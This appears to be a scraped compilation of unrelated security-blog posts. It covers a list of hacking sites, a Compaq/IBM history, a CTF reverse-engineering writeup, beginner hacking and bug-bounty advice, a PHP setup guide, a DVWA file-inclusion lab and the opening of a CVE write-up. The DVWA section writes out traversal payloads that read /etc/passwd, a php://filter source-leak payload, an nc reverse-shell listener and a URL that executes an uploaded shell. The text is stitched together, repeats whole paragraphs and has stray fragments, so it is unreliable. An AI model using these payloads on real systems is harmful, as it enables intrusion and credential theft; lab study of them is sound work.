- SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.

- Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.

- SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.

- HackRead: A news platform centered on InfoSec, cybercrime, privacy, surveillance and hacking news, with full-scale reviews of social media platforms.

- The Hacker News: The most trusted and widely acknowledged online cybersecurity news magazine, with in-depth technical coverage of cybersecurity.

- Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.

- Metasploit: Find security issues, verify vulnerability mitigations and manage security assessments with Metasploit. Get the world's best penetration testing software now.

- Phrack Magazine: Digital hacking magazine.

- Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.

- KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.

- NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.

- Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.

Tuesday, June 30, 2020

Top 12 Free Websites to Learn Hacking

Thursday, June 11, 2020

Everyone Against IBM! Or How Compaq Beat (With a Little Help From Its Friends) the Giant IBM in the PC War

In the fantastic series "Halt and Catch Fire", which is loosely based on the history of Compaq (especially in its first season), we see one of the greatest feats of engineering (and, incidentally, of marketing) ever achieved, with all due respect to Steve Wozniak and his Apple I. Its two protagonists want to build an IBM-compatible computer, but to do so they must first overcome a major obstacle: creating a BIOS "similar" to the one made by Big Blue (IBM's nickname).

Figure 1: Everyone against IBM! Or how Compaq beat (with a little help from its friends) the giant IBM in the PC war

That is exactly what happened when Compaq's first employees set out to build a cheaper computer that could run applications written for IBM machines. This sparked what may be the biggest commercial battle of all time, at least in the computer world. By the way, you can find the full story, along with many others about real hackers, in our book "Microhistorias: Anécdotas y Curiosidades de la historia de la Informática (y los hackers)" from 0xWord.

Figure 2: The book "Microhistorias: Anécdotas y curiosidades de la historia de la informática (y los hackers)" from 0xWord

This task, of course, was anything but easy. Compaq's three founders, Rod Canion, Jim Harris and Bill Murto, knew that the process had to be handled very carefully. To keep IBM from accusing them of plagiarism for copying its BIOS, they decided to write their own. They reverse engineered IBM's BIOS and, starting from that information, built their own in order to avoid a lawsuit (although, as we will see later, they would not escape legal trouble entirely). For this arduous task they set up two teams: one reverse engineered the original BIOS, while the other wrote a new one from scratch based on the first team's findings.

Figure 3: Jim Harris, Bill Murto and Rod Canion, founders of Compaq

To sum up this part of the story (everything surrounding Compaq's founding and the reverse engineering would make for another Microhistoria), they finally succeeded, and so the first IBM clone that was also portable was born: the Compaq Portable (about $3,500 at the time, with dual floppy drives). Although they invested a million dollars in manufacturing, it was very profitable, bringing in more than $111 million in its first year on the market alone. Mission accomplished, but this is only the beginning of the story of David (and a few friends) versus Goliath.

Figure 4: The first IBM-compatible computer, the Compaq Portable

IBM, as you can imagine, did not sit idly by. It tried by every means to stop Compaq from bringing its clones to market, using all of its legal resources (veritable armies of lawyers). In the end, it got Compaq to pay several million in penalties for infringing its patents, which, curiously, had nothing to do with the BIOS but with other components of the computer, such as the power supply.

But Compaq had opened Pandora's box. Other manufacturers of the time saw the gold mine in building IBM-compatible personal computers, since these dominated the software business, especially business management software. So IBM had to do something radical if it did not want to lose a market that had been exclusively its own for years.

Figure 5: Compaq's original logo

By the late eighties, Compaq was already selling more computers than IBM, something truly unthinkable a few years earlier. In 1987, in a desperate reaction against Compaq, IBM surprised the industry with a new technology called Micro Channel Architecture, the 16/32-bit Micro Channel (MCA) bus, far more capable than the ISA bus technology of the day. At the same time, it launched a brand-new computer built on this architecture: the IBM PS/2. The idea was to offer something new and innovative that would keep the clone makers busy for a few years and thus let IBM retake the lead in the PC market.

The new hardware was a radical change. Besides the new MCA bus, it included other new features such as the now-famous PS/2 port for keyboard and mouse, and a dual BIOS: one for compatibility with older PCs (Compatible BIOS, CBIOS) and an entirely new one (Advanced BIOS, ABIOS). The new ABIOS included protected-mode support used by the OS/2 operating system, IBM's other surprise.

Figure 6: Models of IBM's PS/2 family

OS/2 was an operating system (developed together with Microsoft) that was announced at the same time as the IBM PS/2. The problem was that it reached the market somewhat late, so the first models shipped with the classic IBM PC DOS 3.3. Even so, the move looked as if it was going to work. The new architecture was much better than the old one and, in addition, practically all existing software (the big trump card every manufacturer wanted to keep) remained compatible.

With this new hardware and OS/2, which offered features that were innovative for the time, such as protected mode, a graphical API and a new file system called HPFS, IBM's new offensive could not fail. It had it all: faster, more efficient hardware (although none of the expansion hardware developed until then could be installed in the new computer) and a new foundation for developing more advanced software.

Figure 7: OS/2 Warp, which bears a reasonable resemblance to Windows

IBM protected all of the IBM PS/2 technology almost to the point of absurdity. The number of patents covering its components, whether software or hardware, was truly enormous. They could not let what had happened with Compaq happen again. This time they were going to build an empire anew, but on their own terms from the ground up. In fact, the fees they charged (up to 5%) for a third-party company to use the new technology were truly exorbitant, so only a small number of companies dared to build hardware or software compatible with the PS/2.

So IBM sat back and waited for its competitors to react, not without some satisfaction: if they wanted to keep "imitating" its products, this time everything was tied up so that they would have to pay. But, against all odds, its competitors' response took IBM, and the industry as a whole, completely by surprise.

Figure 8: An IBM XGA-2 32-bit graphics card with MCA technology

In 1988, just one year after IBM's move, the nine leading IBM clone makers of the time, AST Research, Compaq Computer (leading the consortium), Epson, HP, NEC, Olivetti, Tandy, WYSE and Zenith Data Systems, responded to the challenge with something truly innovative that IBM did not expect at all: they created a new "open" standard called EISA, which was compatible with all existing hardware for the IBM PC XT bus. It also offered new features (such as bus mastering and 32-bit addressing of up to 4 GB of memory) to make it faster and more efficient, almost on par with MCA. IBM had not seen this coming.

Figure 9: The EISA bus

This complete change of strategy threw Big Blue off balance. It tried by every means to push its IBM PS/2 and OS/2, but little by little EISA won the battle. EISA was cheaper to implement and, being open, anyone could build it. The final battle for supremacy in the PC industry had begun, and EISA was born to win from the very start.

IBM might well have won this battle if, instead of creating something entirely new and incompatible, it had focused more on compatibility with older systems and released something similar to EISA, but with more affordable fees and royalties. That way, the other companies would have had no choice but to follow in its wake, with IBM in the lead. Unfortunately, its radical strategy pushed its competitors into launching an open system, splitting the market in a way that IBM ended up losing.

Figure 10: EISA and ISA video card, ELSA Winner 1000

After the failure of MCA and the PS/2, despite the PS/2 being a great computer and OS/2 a great operating system, IBM began its decline as a PC maker. Even so, IBM stayed afloat on PS/2 sales (it sold 1.5 million units) and, in 1996, even built computers with an integrated EISA bus until the arrival of PCI. But IBM stalled in the PC market and, in 2004, finally sold its PC division to the Chinese company Lenovo. IBM never recovered from the huge failure of the PS/2 and the unexpected strategy of the Gang of Nine. Compaq had won the PC battle.

But the most curious thing about all this is that, in the end, the real winner of all these merciless battles has been IBM. After its fierce fight with Compaq, IBM focused more on (enterprise) software, servers and even supercomputers, in other words, on research and high-performance computing. Today IBM is one of the leaders in artificial intelligence (AI) research with its flagship Watson, AI hardware and software aimed at business, launching processors such as Power9, and it is betting heavily on quantum computing. It also owns Red Hat, the company behind one of the most widely used commercial Linux distributions. IBM is perhaps the best implicit demonstration of how to reinvent yourself when something or someone moves your "cheese", something we must keep in mind now more than ever given the new global situation, as Chema Alonso explained in this post.

Figure 11: The IBM Watson supercomputer

Yet IBM has survived and remains at the forefront of technological innovation. In fact, the first commercial quantum computer was also built by IBM. Are we on the verge of a new war, this time for the quantum computer market? In a way, IBM has retaken the lead in the "PC" (a quantum one this time). In any case, let's see who is brave enough to reverse engineer the BIOS of a quantum computer, if it even has one ;). By the way, the documentary "Silicon Cowboys" tells the story of Compaq and its war with IBM in detail. Not bad for three entrepreneurs who originally wanted to open a Mexican restaurant... good thing they changed their minds.

Happy Hacking Hackers!!!

Authors:

Fran Ramírez (@cyberhadesblog) is a security researcher and a member of the Ideas Locas team at CDO at Telefónica, co-author of the books "Microhistorias: Anécdotas y Curiosidades de la historia de la informática (y los hackers)", "Docker: SecDevOps" and "Machine Learning aplicado a la Ciberseguridad", as well as of the CyberHades blog. You can contact Fran Ramírez on MyPublicInbox.

Rafael Troncoso (@tuxotron) is a Senior Software Engineer at SAP Concur, co-author of the books "Microhistorias: Anécdotas y Curiosidades de la historia de la informática (y los hackers)" and "Docker: SecDevOps", as well as of the CyberHades blog. You can contact Rafael Troncoso on MyPublicInbox.

This article is the property of Tenochtitlan Offensive Security. See the full article --> https://tenochtitlan-sec.blogspot.com

NcN 2015 CTF - theAnswer Writeup

1. Overview

It is a statically linked, stripped 32-bit ELF binary, but the good news is that it was compiled with gcc, so there are no nasty runtimes or libraries to fingerprint, just libc... and libpthread.

This binary was written by Ricardo J. Rodríguez.

When executed, it appears to be computing the flag:

But the process never ends... let's see what strace says:

There is a thread deadlock. A good starting point may be to look in IDA at the xrefs to 0x403a85.

Perhaps the flag is encrypted and never gets decrypted because of the lock.

This can be solved in two ways:

- static: understanding the cryptosystem and programming our own decryptor

- dynamic: fixing the binary and running it (hard: anti-debugging, futex, rand()...)

At first sight I thought the dynamic approach would be quicker, but it turned out to be more complex than the static one.

2. Static approach



Following the xrefs to the futex, it is possible to locate main:

With libc/libpthread function fingerprinting, or a bit of manual work, we recover the symbols. Here is main, where 255 threads are created and joined; when the threads finish, the XOR key is calculated and print_flag is called:

The thread code is passed to libc_pthread_create. IDA recognizes this area as data, but it can be selected and defined as code and as a function.

This is the decompiled thread code, where we can see two infinite loops, one for ptrace detection and one for preload detection (even though the binary is static). These anti-debug/anti-hook checks are easy to spot at this point.
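The writeup does not show exactly how the preload check is implemented. As a minimal sketch, assuming it simply inspects the `LD_PRELOAD` environment variable (the function name `preload_detected` is hypothetical, not a symbol recovered from the binary), the idea looks like this. Note that for a statically linked binary the dynamic loader never processes `LD_PRELOAD`, which is why the check adds little here.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>

/* Hypothetical anti-hook check: returns 1 if LD_PRELOAD is set to a
 * non-empty value (i.e. someone asked the loader to inject a library),
 * 0 otherwise. This is an assumed implementation, not the binary's code. */
int preload_detected(void)
{
    const char *p = getenv("LD_PRELOAD");
    return p != NULL && p[0] != '\0';
}
```

A hardened binary would not return here; it would spin in a loop such as `while (preload_detected()) ;`, which is the kind of infinite loop the decompiled thread code exposes.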

Now the important question: is the key random? Well, with the same seed the random sequence will always be the same, so the key is "hidden" in the predictability of rand().

If the threads do not run in creation order, the key will be wrong, because it is XORed with th_id, the identifier of the current thread.

The print_key function XORs the key with flag_cyphertext byte by byte.
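The byte-by-byte XOR described above can be sketched as follows. This assumes the key buffer is at least as long as the ciphertext; `xor_bytes` is a hypothetical helper, not a function recovered from the binary. Because XOR is its own inverse, the same routine both encrypts and decrypts.

```c
#include <stddef.h>

/* XOR each input byte with the key byte at the same position and store
 * the result in out. Assumes key has at least len bytes. */
void xor_bytes(const unsigned char *in, const unsigned char *key,
               unsigned char *out, size_t len)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ key[i];
}
```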

And here we have the seed and the first bytes of the ciphertext:

With radare we can quickly convert this into a C variable:

And here is the flag ciphertext:

And with a bit of radare magic, we get the initialized C array:

radare is full-featured :)

With a bit of rand() calibration, here is the solution...
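The "calibration" boils down to consuming the same number of rand() outputs that the target consumes before the values you need. Here is a minimal sketch, assuming each key byte is the low byte of one rand() call (the real derivation is in the linked solution.c and may differ). It also assumes you link against the same libc as the target, because glibc, musl and other C libraries produce different sequences for the same seed. `keystream`, `seed` and `skip` are illustrative names.

```c
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical keystream builder: seed the PRNG, discard `skip` outputs
 * so our sequence lines up with the target's rand() calls, then take the
 * low byte of each subsequent call. Same seed + same skip = same bytes. */
void keystream(unsigned int seed, size_t skip, unsigned char *out, size_t n)
{
    srand(seed);
    for (size_t i = 0; i < skip; i++)
        (void)rand();               /* calibration: drop early outputs */
    for (size_t i = 0; i < n; i++)
        out[i] = (unsigned char)(rand() & 0xff);
}
```

XORing the ciphertext with this output recovers the plaintext only when both `seed` and `skip` match what the binary actually does.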

The code:

https://github.com/NocONName/CTF_NcN2k15/blob/master/theAnswer/solution.c

3. The Dynamic Approach

First we have to patch the anti-debugging checks. At the beginning of the thread there are two obvious ones (an anti-preload-hook check and an anti-ptrace-debugging check), and the infinite loops make them even more evident:

There is also a third, quieter anti-debug check that detects a debugger through the first available file descriptor. And here comes the nasty part: it does not crash the program. Execution continues, but the seed is modified slightly, so the decryption key will be wrong.

The seed is incremented by one. This could be a normal program feature, but it is only triggered if fileno(open("/","r")) > 3. This is a well-known anti-debug trick, and it can also be spotted in a traced execution.
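The descriptor trick relies on POSIX `open()` always returning the lowest unused descriptor. A freshly started process usually has only 0, 1 and 2 open, so the first `open()` returns 3, and a debugger or wrapper that leaks extra descriptors into the child pushes that number higher. This is a sketch of the general technique, assuming the check compares the descriptor returned for `/` against 3 as described above; `leaked_fd_check` is a hypothetical name and the binary's exact code may differ.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <unistd.h>

/* Returns 1 if the first free descriptor is above 3 (extra fds were
 * inherited, a common sign of a debugger), 0 if not, -1 if open() failed. */
int leaked_fd_check(void)
{
    int fd = open("/", O_RDONLY);   /* directories may be opened read-only */
    if (fd < 0)
        return -1;
    close(fd);
    return fd > 3 ? 1 : 0;
}
```

On Linux, you can confirm which descriptors a traced process inherited by listing `/proc/<pid>/fd`.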

OK, it is just a one-byte patch: seed+=1 becomes seed+=0 (add eax, 1 becomes add eax, 0).
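To apply a patch like this outside IDA or radare, a small C helper is enough. `add eax, 1` normally assembles to the three bytes `83 C0 01` (this assumes the short imm8 encoding), so turning it into `add eax, 0` means rewriting only the last byte to `00`. The writeup does not give the file offset of that byte, so `offset` must be looked up in the disassembler; `patch_byte` is a hypothetical helper.

```c
#include <stdio.h>

/* Overwrite one byte at `offset` in the file at `path`.
 * Returns 0 on success, -1 on any I/O error. */
int patch_byte(const char *path, long offset, unsigned char value)
{
    FILE *f = fopen(path, "r+b");   /* read/write, no truncation */
    if (f == NULL)
        return -1;
    int ok = fseek(f, offset, SEEK_SET) == 0 && fputc(value, f) != EOF;
    if (fclose(f) != 0)             /* fclose flushes the write */
        ok = 0;
    return ok ? 0 : -1;
}
```

Work on a copy of the binary: patching the wrong offset silently corrupts unrelated code.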

before:

after:

To patch the two infinite loops, just NOP out the two bytes of each jmp $-0.
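A short jump to itself (`jmp $`) is encoded as `EB FE`, so NOPing it out means writing `90 90` over those two bytes. The sketch below does this over an in-memory buffer. `nop_self_jumps` is hypothetical, and replacing every `EB FE` pair is an assumption that only holds if that byte pair appears nowhere else; in practice you would patch only the offsets identified in the disassembler.

```c
#include <stddef.h>

/* Replace each x86 short jump-to-self (EB FE) in buf with two NOPs (90 90).
 * Returns the number of loops patched. */
size_t nop_self_jumps(unsigned char *buf, size_t len)
{
    size_t patched = 0;
    for (size_t i = 0; i + 1 < len; i++) {
        if (buf[i] == 0xEB && buf[i + 1] == 0xFE) {
            buf[i] = 0x90;
            buf[i + 1] = 0x90;
            patched++;
            i++;                    /* skip the second byte we rewrote */
        }
    }
    return patched;
}
```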

OK, but repairing this binary is harder than building a decryptor; we need to fix more things:

- The sleep(randInt(1,3)) at the beginning of the thread, so that the threads execute in the correct order

- The pthread_cond_wait, to avoid the futex()

- We also need to calibrate rand() to get the key (just patch the sleep and add another rand() call before the pthread_create loop)

The extra rand() call has to be added with a patch, because from gdb it is not possible to call rand() in this binary.

With these modifications, the binary prints the key by itself.

How To Start | How To Become An Ethical Hacker

Are you tired of reading endless news stories about ethical hacking and not really knowing what that means? Let's change that!

This post is for people who:

- Have No Experience With Cybersecurity (Ethical Hacking)

- Have Limited Experience.

- Those That Just Can't Get A Break

OK, let's dive into the post and suggest some ways that you can get ahead in Cybersecurity.

I receive many messages asking how to become a hacker. "I'm a beginner in hacking, how should I start?" or "I want to be able to hack my friend's Facebook account" are some of the more frequent queries. Hacking is a skill, and you must remember that if you want to learn hacking solely for the fun of breaking into your friend's Facebook account or email, things will not work out for you. You should decide to learn hacking because of your fascination with technology and your desire to become an expert in computer systems. It's time to change the color of your hat 😀

I've had my fair share of hats. Black, white or sometimes a blackish shade of grey. The darker it gets, the more fun you have.

If you have no experience, don't worry. We ALL had to start somewhere, and we ALL needed help to get where we are today. No one is an island and no one is born with all the necessary skills. Period. OK, so you have zero experience and limited skills... my advice in this case is to teach yourself some absolute fundamentals.

Let's get this party started.

- What is hacking?

Hacking is identifying weaknesses and vulnerabilities in a system and using them to gain access.

A hacker gains unauthorized access by targeting a system, while an ethical hacker has official permission to assess the security posture of the target system(s) in a lawful and legitimate manner. There are several types of hackers, so here is a bit of terminology:

White hat: ethical hacker.

Black hat: classic hacker who gains unauthorized access.

Grey hat: a person who gains unauthorized access but reveals the weaknesses to the company.

Script kiddie: a person with no technical skills who just uses pre-made tools.

Hacktivist: a person who hacks for a cause and leaves messages, for example in a protest against copyright.

- Skills required to become an ethical hacker.

- Curiosity and exploration

- Operating System

- Fundamentals of Networking

How To Start PHP And MYSQL | The Best Server For PHP And MYSQL | Tutorial 1

Many people want to start PHP programming combined with MySQL database concepts, so I thought I should start a series about PHP and MySQL. In this series of video tutorials you will get exactly that content.

PHP is a server-side scripting language, so it needs a server to execute before the result reaches the web browser. First, download and install a server package such as XAMPP, WAMP or LAMP. I'm using XAMPP in these tutorials, so if you want to follow along, download XAMPP. I use it because it has a good interface and it's really simple. XAMPP runs on Windows, macOS and Linux, while WAMP is only for Windows and LAMP targets Linux. So I prefer XAMPP for this series.

How to create Database

Step 1:

Open your XAMPP control panel and start the Apache and MySQL services.

Step 2:

Go to your web browser and type "localhost/phpmyadmin". This opens your database area. If you get an error, your services are not running. If you still get an error, leave a comment below.

Step 3:

Click "New" to create a new database.

Step 4:

Enter a database name, for example Facebook, Students, etc., and click the Create button.

Step 5:

Enter a table name such as admin, users, etc. You can increase or decrease the number of columns. Click the Save/Create button.

Step 6:

Enter your attribute names in the first column, such as Username, Email, Password, etc. In the next column, select the data type, for example integer or string. In the column after that, set the length of the string.

Step 7:

If you want a primary key, just check the Auto_Increment (A_I) box, as shown in the video. Watch the video for a better understanding.

How Do I Get Started With Bug Bounty?

How do I get started with bug bounty hunting? How do I improve my skills?

These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!

A major part of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, the hacker is more likely to understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around with attempting to "claim" that domain.

Read books. Lots of books.

One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups on a variety of security-related topics that will not only motivate you but also help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.

As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance and beyond. The bug bounty community consists of hunters, security analysts and platform staff helping one another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.

Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.

Help others. If you can teach it, you have mastered it.

Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.

The bug bounty community is full of people wanting to help others, so do not be surprised if someone gives you constructive feedback about your work. Learn from your mistakes and use them to your advantage. I keep a little physical notebook where I track the little things I learned during the day and the feedback people gave me.

Learn to approach a target.

The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."

As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

Related wordThese are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!

A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.

One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.

As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance and beyond. The bug bounty community consists of hunters, security analysts, and platform staff helping one another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.

Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.

Help others. If you can teach it, you have mastered it.

Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will also truly master the topic, because writing it up forces you to explain it properly.

Wednesday, June 10, 2020

Learning Web Pentesting With DVWA Part 6: File Inclusion

In this article we are going to go through File Inclusion Vulnerability. Wikipedia defines File Inclusion Vulnerability as: "A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic directory traversal attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability will result in remote code execution on the web server that runs the affected web application."

There are two types of File Inclusion Vulnerabilities, LFI (Local File Inclusion) and RFI (Remote File Inclusion). Offensive Security's Metasploit Unleashed guide describes LFI and RFI as:

"LFI vulnerabilities allow an attacker to read (and sometimes execute) files on the victim machine. This can be very dangerous because if the web server is misconfigured and running with high privileges, the attacker may gain access to sensitive information. If the attacker is able to place code on the web server through other means, then they may be able to execute arbitrary commands.

RFI vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local machine, the attacker is able to execute code hosted on their own machine."

In simpler terms, LFI allows us to use the web application's execution engine (say, PHP) to execute local files on the web server. RFI allows us to execute remote files within the context of the target web server. Those remote files can be hosted anywhere, as long as they can be reached from the network the web server is running on.
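The `../` payloads used below rely on how a relative include path is resolved against the script's working directory. Here is a minimal Python model of that resolution. `SCRIPT_DIR` is a hypothetical location chosen for illustration, and DVWA's actual directory on your setup may differ. The model also ignores PHP details such as `include_path` lookup and symlinks.

```python
import posixpath

# Hypothetical directory of the vulnerable script (not necessarily DVWA's real path).
SCRIPT_DIR = "/var/www/html/vulnerabilities/fi"


def traversal_payload(depth: int, target: str = "etc/passwd") -> str:
    """Build a payload that climbs `depth` directories before reaching `target`."""
    return "../" * depth + target


def resolve_include(page: str, cwd: str = SCRIPT_DIR) -> str:
    """Roughly how a relative include('../...') path resolves against the working directory."""
    # For absolute paths, normpath drops '..' components that would climb above '/'.
    return posixpath.normpath(posixpath.join(cwd, page))


for depth in range(1, 8):
    payload = traversal_payload(depth)
    print(depth, payload, "->", resolve_include(payload))

print(resolve_include("../../hackable/uploads/revshell.php"))
```

With this hypothetical `SCRIPT_DIR`, every payload with five or more `../` lands on `/etc/passwd`, because `../` at the root stays at the root. That is why using more `../` than needed never hurts.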

To follow along, click on the File Inclusion navigation link of DVWA; you should see a page like this:

Let's start by performing an LFI attack on the web application.

Looking at the URL of the web application, http://localhost:9000/vulnerabilities/fi/?page=include.php, we can see a parameter named page, which is used to load different PHP pages on the website.

Since it is loading different pages, we can guess that it is loading local files from the server and executing them. Let's try to read the famous /etc/passwd file found on every Linux system. To do that, we have to find a way to reach it via our LFI. We will start with the payload ../etc/passwd.

Entering this payload in the page parameter of the URL (http://localhost:9000/vulnerabilities/fi/?page=../etc/passwd), we get nothing back, which means the file was not found at that path. Let's try to understand what we are trying to accomplish. We are asking for a file named passwd in a directory named etc, which is one directory up from our current working directory. The etc directory lies at the root (/) of a Linux file system. We guessed that we are in a directory (say, www) that also lies at the root of the file system. That's why we tried to go up by one directory and then move into the etc directory, which contains the passwd file. Our next guess is that we may be two directories deeper, so we modify our payload to ../../etc/passwd.

We get nothing back. We continue to modify our payload, assuming we are one more directory deeper: ../../../etc/passwd.

No luck again, so let's try one more: ../../../../etc/passwd.

Still nothing. We keep going one directory deeper until we are seven directories deep and our payload becomes ../../../../../../../etc/passwd,

which returns the contents of the passwd file as seen below:

Because the shorter payloads returned nothing, this tells us that our current working directory is seven levels below the root (/) directory. A payload with more ../ than needed would also have worked, since ../ at the root is simply ignored. It also proves that our LFI is a success. We can also use PHP filters to extract more information from the server. For example, if we want to get the source code of the web application, we can use the php://filter wrapper like this:

php://filter/convert.base64-encode/resource=index.php

We will get a base64-encoded string. Let's copy that string into a file, save it as index.php.b64 (the name can be anything), and then decode it like this:

cat index.php.b64 | base64 -d > index.php
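The same encode/decode round trip can be reproduced in Python. This also shows why the encoded output is safe to include. The PHP snippet is a hypothetical stand-in for index.php. The key point is that the base64 alphabet (A-Z, a-z, 0-9, `+`, `/`, `=`) contains no `<` or `?`, so the encoded text can never contain a `<?php` open tag for the interpreter to execute.

```python
import base64

# Hypothetical PHP source standing in for index.php.
php_source = b"<?php\n$file = $_GET['page'];\ninclude($file);\n?>\n"

# Roughly what php://filter/convert.base64-encode/resource=index.php hands back.
encoded = base64.b64encode(php_source)

# No '<' can appear in base64 output, so PHP has no open tag to execute
# and simply echoes the text.
assert b"<" not in encoded
print(encoded.decode("ascii"))

# Decoding restores the exact source, just like `base64 -d`.
decoded = base64.b64decode(encoded)
print(decoded.decode("utf-8"))
```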

We will now be able to read the web application's source code. But you may be wondering why we didn't simply fetch index.php without using the PHP filter. The reason is that if we include a PHP file via LFI, the PHP interpreter will execute it rather than display it as text. As a workaround, we first encode it as base64. The interpreter won't execute the encoded text, since it is not PHP code, so it simply displays it.

Next, we will try to get a shell. Before PHP 5.2, remote files could be included whenever allow_url_fopen was enabled (which it was by default). PHP 5.2.0 introduced the separate allow_url_include setting, which is disabled by default. Since our DVWA app runs on PHP 5.2+, we cannot use older methods like the php://input wrapper or RFI to get a shell on DVWA unless we change the default settings (which I won't). Instead, we will upload a reverse shell using the File Upload functionality and then access that uploaded reverse shell via LFI.

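Let's upload our reverse shell via the File Upload functionality. Then we set up a netcat listener (-l listen, -v verbose, -n no DNS lookups, -p port 9999) to catch the connection coming back from the server:

nc -lvnp 9999

Then, using our LFI, we execute the uploaded reverse shell by requesting this URL:

http://localhost:9000/vulnerabilities/fi/?page=../../hackable/uploads/revshell.php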

Voila! We have a shell.

To learn more about the File Upload vulnerability and the reverse shell we used here, read Learning Web Pentesting With DVWA Part 5: Using File Upload to Get Shell. Attackers usually chain multiple vulnerabilities to get as much access as they can. This is a simple example of how two of them (Unrestricted File Upload + LFI) can be combined to escalate an attack. If you are interested in learning more about PHP wrappers, the LFI Cheat Sheet is a good read. If you want to try the wrapper-based (php://input) and RFI attacks against DVWA, you will have to enable the allow_url_include setting by logging in to the DVWA server. That's it for today, have fun.

Leave your questions and queries in the comments below.

For reference, here are the URLs, payloads, and commands used in this walkthrough, in order:

http://localhost:9000/vulnerabilities/fi/?page=include.php

../etc/passwd

http://localhost:9000/vulnerabilities/fi/?page=../etc/passwd

../../etc/passwd

../../../etc/passwd

../../../../etc/passwd

../../../../../../../etc/passwd

php://filter/convert.base64-encode/resource=index.php

cat index.php.b64 | base64 -d > index.php

nc -lvnp 9999

http://localhost:9000/vulnerabilities/fi/?page=../../hackable/uploads/revshell.php

References:

- FILE INCLUSION VULNERABILITIES: https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/

- php://: https://www.php.net/manual/en/wrappers.php.php

- LFI Cheat Sheet: https://highon.coffee/blog/lfi-cheat-sheet/

- File inclusion vulnerability: https://en.wikipedia.org/wiki/File_inclusion_vulnerability

- PHP 5.2.0 Release Announcement: https://www.php.net/releases/5_2_0.php

CVE-2020-2655 JSSE Client Authentication Bypass

During our joint research on DTLS state machines, we discovered a really interesting vulnerability (CVE-2020-2655) in the recent versions of Sun JSSE (Java 11, 13). Interestingly, the vulnerability not only affects DTLS implementations but also affects the TLS implementation of JSSE in a similar way. The vulnerability allows an attacker to completely bypass client authentication and to authenticate as any user whose certificate it knows, WITHOUT needing to know the private key. If you just want the PoCs, feel free to skip the intro.

DTLS is the crayon-eating brother of TLS. It was designed to be very similar to TLS, but with the changes necessary to run TLS over UDP. DTLS currently exists in two versions (DTLS 1.0 and DTLS 1.2), where DTLS 1.0 roughly equals TLS 1.1 and DTLS 1.2 roughly equals TLS 1.2. DTLS 1.3 is currently in the process of being standardized. But what exactly are the differences? If a protocol uses UDP instead of TCP, it can never be sure that all the messages it sent were actually received by the other party, or that they arrived in the correct order. If we just ran vanilla TLS over UDP, an out-of-order or dropped message would break the connection (not only during the handshake). DTLS therefore includes additional sequence numbers that allow for the detection of out-of-order handshake messages or dropped packets. The sequence number is transmitted within the record header and is increased by one for each record transmitted. This is different from TLS, where the record sequence number is implicit and not transmitted with each record. The record sequence numbers are especially relevant once records are transmitted encrypted, as they are included in the additional authenticated data or HMAC computation. This allows a receiving party to verify AEAD tags and HMACs even if a packet was dropped in transport and the counters are "out of sync".
